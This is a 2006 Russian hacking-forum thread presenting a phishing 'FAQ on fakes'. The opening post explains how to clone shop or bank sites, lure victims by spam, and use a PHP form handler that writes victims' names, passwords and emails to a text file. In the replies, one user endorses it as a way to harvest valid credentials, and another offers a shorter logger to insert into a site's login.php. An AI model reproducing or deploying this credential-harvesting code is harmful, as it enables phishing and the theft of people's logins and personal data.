ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > ИНФО > Статьи
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

перехват форм на php or faq по фейкам
  #1  
Старый 14.06.2006, 02:25
Аватар для godlove
godlove
Новичок
Регистрация: 07.06.2006
Сообщений: 6
Провел на форуме:
10494

Репутация: 1
По умолчанию перехват форм на php or faq по фейкам

what's it?
Fake(фейк) в переводе с английского-подделка,обман.
Фишинг бывает трех видов
1)Почтовый.
2)Онлайновый.
3)Комбинированный.
Первый из них самый старый,сейчас уже не актуалент почти.Второй - онлайновый подрузумевает под сабой копирование
сайта(например е-шопа),регистрацией похожего доменого имени,в тоже зоне что и офф.шоп.Только разница лишь в том что на нем
предлагаются товары по очень низким ценам(привет эльдорадо -)),ну и как ты понял,товар до покупателя не когда не дойдет
-),а вот ту инфу что он вбил в форме может нести вполне ощутимую информацию.Третий вид наиболее актуален в данное время.Он
подрузумеват под собой полное копирование конторы(например банка ну или сайтов связанных с электронной комерцией),на него
юзер заманивается 2-мя спосабами:
1)троем
2)спамом.
Let's go .

для начали просмотрим небольшую хтмл форму
PHP код:
<form action="evil_script.php" method="post">  <input type="text" name="name">  <input type="text" name="passwod">  <input type="text" name="email">  <input type="submit" value="send"
для тех кто не очень знаком с хтмл я кое что обьясню:
evil_script.php - сообственно говоря наш "зло_скрипт" который будет обрабатывать все данные что ввел юзер и отправляться в
виде пакета методом POST.
Первым делом мы обрабатываем вводимые данные пользователем суперглобаным массивом $HTTP_POST_VARS($_POST сокращенно)
делается это слеудющим образом, в нашем случаем у нас три значения - name,password,email
PHP код:
<?  $n $_POST['name'];  $p $_POST['password'];  $e $_POST['email'];  ?>
вроде пока все верено.смотрим след пункт,что у нас нас ? правельность вводоимых данных.Конечно можно заюзать регулярные
выражения,но есть одно НО.Мы веть не знаем какого вида у нас будет точно логин,пароль? единственное можно заюзать регулырне
выражения например для email.
PHP код:
if(!preg_math("/[0-9a-z_]+@[0-9a_z^\.]+\.[a-z]
{2,3}/i"
,$email))  {  echo "неверно введен e-mail.Введите адрес электронной почты в виде mail@server.com";  exit; 
Проще там проверить ввел ли данны юзер в поля name,password,email.можно конечно реализовать с помошью функции empty(), но
я передпочел более легкий способо при помощи функции strlen().
PHP код:
if((!strlen($_POST['name']) > 0) || (!strlen($_POST['pass']) > 0) || (!strlen($_POST['email']) > 0))  {  echo "не все данные введены";  echo "<br>";  echo '<a href="'.$_SERVER['PHP_SELF'].'">вернуться обратно</a>';  } 
Теперь данные должны записывать в файл.Причем запись должна осуществляться с конца строки.
Юзать мы будем на выбор или fwrite() или fput() мне больше по душе fwrite(),сам хз почему.
для начала созданим на сервере файл , в нашем случаем 1.txt и не забуть выставит на него права (chmod +x)
далее все реализуется очень просто .
PHP код:
else   {  @$f fopen("1.txt","a");  if(!$f)  {   echo "файл отсутвувет!";  }  else   {   @fwrite($f"name:$n;password:$p;email:$e \n");  }  fclose($f);  } 
 
Ответить с цитированием

  #2  
Старый 14.06.2006, 03:51
Аватар для NaX[no]rT
NaX[no]rT
Members of Antichat
Регистрация: 03.09.2005
Сообщений: 594
Провел на форуме:
3606217

Репутация: 685


Отправить сообщение для NaX[no]rT с помощью ICQ
По умолчанию

Кхм ... читал макаронами подавился. Что за хрень?)) к чему она?
 
Ответить с цитированием

  #3  
Старый 14.06.2006, 06:33
Аватар для lexa
lexa
Участник форума
Регистрация: 14.01.2005
Сообщений: 169
Провел на форуме:
427901

Репутация: 23
Отправить сообщение для lexa с помощью ICQ
По умолчанию

Цитата:
Сообщение от NaX[no]r†  
Кхм ... читал макаронами подавился. Что за хрень?)) к чему она?
"перехват форм на php or faq по фейкам"

помоему нармальная и нужная faqшка =)
парень расписал как сливать внесенные данныее! тоесть делай сайт с порнушкой рекламь и делай базу кред ! причем всегда валид =)))
 
Ответить с цитированием

  #4  
Старый 14.06.2006, 11:17
Аватар для Nova
Nova
OpenVPN.CC
Регистрация: 15.07.2005
Сообщений: 1,599
Провел на форуме:
7670961

Репутация: 1034


Отправить сообщение для Nova с помощью ICQ
По умолчанию

Смысл статьй мне всё равно не ясен к чему это ????
Зачем перехватывать формы на своём же сайте ???
илиэто я не вьехал =(
 
Ответить с цитированием

  #5  
Старый 14.06.2006, 18:26
Аватар для Дикс
Дикс
Познавший АНТИЧАТ
Регистрация: 16.04.2006
Сообщений: 1,488
Провел на форуме:
2209675

Репутация: 537


Отправить сообщение для Дикс с помощью ICQ
По умолчанию

PHP код:
if((!strlen($_POST['name']) > 0
ржунимагу
не проще
PHP код:
if((strlen($_POST['name']) == 0
?
а вообще, если уж решил написать тутор,
писал бы сразу весь код и комментами пояснял что да как.
 
Ответить с цитированием

  #6  
Старый 14.06.2006, 18:31
Аватар для GreenBear
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136

Репутация: 4536


Отправить сообщение для GreenBear с помощью ICQ
По умолчанию

Цитата:
{ echo "файл отсутвувет!"; }
ггг, вводит юзверь данные а ему пишет это. мда.
Имхо бред бредом, полозности 0 в квадрате =)
Цитата:
для тех кто не очень знаком с хтмл я кое что обьясню:
ихмо не сделает он достойный фейк, а тот кто сделает - не нуждается в представлении того, что такое форма =)

Последний раз редактировалось Green_Bear; 14.06.2006 в 18:34..
 
Ответить с цитированием

  #7  
Старый 15.06.2006, 02:25
Аватар для godlove
godlove
Новичок
Регистрация: 07.06.2006
Сообщений: 6
Провел на форуме:
10494

Репутация: 1
По умолчанию

Nova
>Зачем перехватывать формы на своём же сайте
цель только одна перехватывать данные что ввел юзер(если не понятно для чего нужен фейк почитай на форуме cw)
Дикс
>ржунимагу
если нет разницы зачем писать по другом и "ржать" ?

Green_Bear
>ихмо не сделает он достойный фейк, а тот кто сделает - не нуждается в представлении того, что такое форма =)
ну эт уже просто придирки %)
 
Ответить с цитированием

  #8  
Старый 15.06.2006, 10:46
Аватар для nerezus
nerezus
Pagan Heart
Регистрация: 12.08.2004
Сообщений: 3,791
Провел на форуме:
6490435

Репутация: 2290


Отправить сообщение для nerezus с помощью ICQ
По умолчанию

я уже на xakepy.ru высказался по поводу статьи этой. Бред.

Кстати тут аякс актуаен
 
Ответить с цитированием

  #9  
Старый 15.06.2006, 11:53
Аватар для max_pain89
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию

Че еще за злоскрипт? Нах он нужен?

Проще будет в файл по умолчанию, например login.php встатить код

PHP код:
@ini_set('error_reporting',0);
$n=$_POST["name"];
$p=$_POST["password"];
$f fopen("1.txt","a");
fwrite($f"name:$n;password:$p\n");
fclose($f); 
 
Ответить с цитированием

  #10  
Старый 15.06.2006, 14:16
Аватар для nerezus
nerezus
Pagan Heart
Регистрация: 12.08.2004
Сообщений: 3,791
Провел на форуме:
6490435

Репутация: 2290


Отправить сообщение для nerezus с помощью ICQ
По умолчанию

для уже ответивших и тех кто будет еще отвечать - не разбираетесь - не лезьте!
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PHP FRAGNATIC PHP, PERL, MySQL, JavaScript 186 21.02.2010 02:41
На PHP, как на "Новые ворота"... Mertvii-Listopad Чужие Статьи 7 18.09.2006 12:42
Безопасность в Php, Часть Iii k00p3r Чужие Статьи 0 11.07.2005 19:02
Защищаем Php. Шаг за шагом. k00p3r Чужие Статьи 0 13.06.2005 11:31
Перехват cookie php скриптом Майор PHP, PERL, MySQL, JavaScript 10 01.04.2005 18:35



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ